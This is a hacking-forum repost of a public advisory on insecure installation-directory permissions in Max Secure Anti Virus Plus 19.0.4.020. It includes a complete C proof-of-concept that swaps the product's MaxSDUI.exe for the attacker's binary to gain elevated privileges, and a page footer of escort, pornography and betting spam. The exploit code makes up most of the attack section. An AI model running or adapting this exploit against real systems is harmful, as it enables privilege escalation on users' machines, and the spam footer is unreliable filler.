[rootturkhacks.com~]
duyuru LiNK KISALTMAK / TEMA VEYA SCRiPT iSTEĞiNDE BULUNMAK YASAKTIR!
duyuru GiZLi iÇERiKLERE "asdafsdfsdf" TARZI YORUM YAPMAK BAN SEBEBIDIR !
hack forum

Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions Vulnerability

#1
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions Vulnerability

Kod:
# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
# Discovery by: hyp3rlinx
# Vendor Homepage: www.maxpcsecure.com
# Tested Version: 19.0.4.020
# CVE: N/A

[+] Credits: John Page (aka hyp3rlinx)          
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
[+] ISR: ApparitionSec          
 

[Vendor]
www.maxpcsecure.com


[Affected Product Code Base]
Max Secure Anti Virus Plus - 19.0.4.020

File hash: ab1dda23ad3955eb18fdb75f3cbc308a
msplusx64.exe


[Vulnerability Type]
Insecure Permissions


[CVE Reference]
N/A


[Security Issue]
Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.

C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
                                                  BUILTIN\Users:(ID)F
                                                  NT AUTHORITY\SYSTEM:(ID)F
                                                  BUILTIN\Administrators:(ID)F


[Affected Component]
Permissions on installation directory


[Exploit/POC]
#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"

/* Max Secure Anti Virus Plus PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
 DWORD dwAttrib = GetFileAttributes(szPath);
 return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
   
 if(!FileExists(DISABLED_TARGET)){
       CopyFile(TARGET, TMP, FALSE);
       Sleep(1000);
   CopyFile(TMP, DISABLED_TARGET, FALSE);
   printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
   Sleep(1000);
   printf("[+] Disabled MaxSDUI.exe ...\n");
   Sleep(300);
  }else{
        PWNED=TRUE;
  }
   
   if(!PWNED){
       char fname[MAX_PATH];
       char newLoc[]=TARGET;
       DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
      if (size){
        printf("[+] Copying exploit to vuln dir...\n");
        Sleep(1000);
        CopyFile(fname, TARGET, FALSE);
        printf("[+] Replaced legit Max Secure EXE...\n");
        Sleep(2000);
        printf("[+] Done!\n");
        MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
        Sleep(1000);
        exit(0);
       }
   }else{
       if(FileExists(TMP)){
                remove(TMP);
       }
       printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
       printf("[+] hyp3rlinx\n");
       system("pause");
    }
}


[POC Video URL]
https://www.youtube.com/watch?v=DXSV5geXkTw



#  0day.today [2019-12-04]  #
imza
Kırık link ve kural ihlallerini ihbar ediniz
[Resim: QP9DEZ.jpg]
Alıntı


Benzer Konular...
Konu: Yazar Cevaplar: Gösterim: Son Mesaj
  Savsoft Quiz 5 - Persistent Cross-Site Scripting Vulnerability 0bir 0 10 07-09-2020, 10:47 PM
Son Mesaj: 0bir
  Webtareas 2.1 / 2.1p File Upload / Information Disclosure Vulnerabilities 0bir 0 4 07-09-2020, 10:47 PM
Son Mesaj: 0bir
  SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin) Vulnerability 0bir 0 6 07-09-2020, 10:46 PM
Son Mesaj: 0bir
  BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password) Vulnerability 0bir 0 7 07-09-2020, 10:46 PM
Son Mesaj: 0bir
  BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation Vulnerability 0bir 0 7 07-09-2020, 10:45 PM
Son Mesaj: 0bir



Bu konuyu görüntüleyen kullanıcı(lar): 1 Ziyaretçi
brazzers premium accounts izmit escort Istanbul escort Istanbul escort istanbul escort ankara escort istanbul escort eryaman escort etimesgut escort En iyi bahis siteleri porno beylikdüzü escort avcılar escort eskişehir escort porno cami halısı taksim escort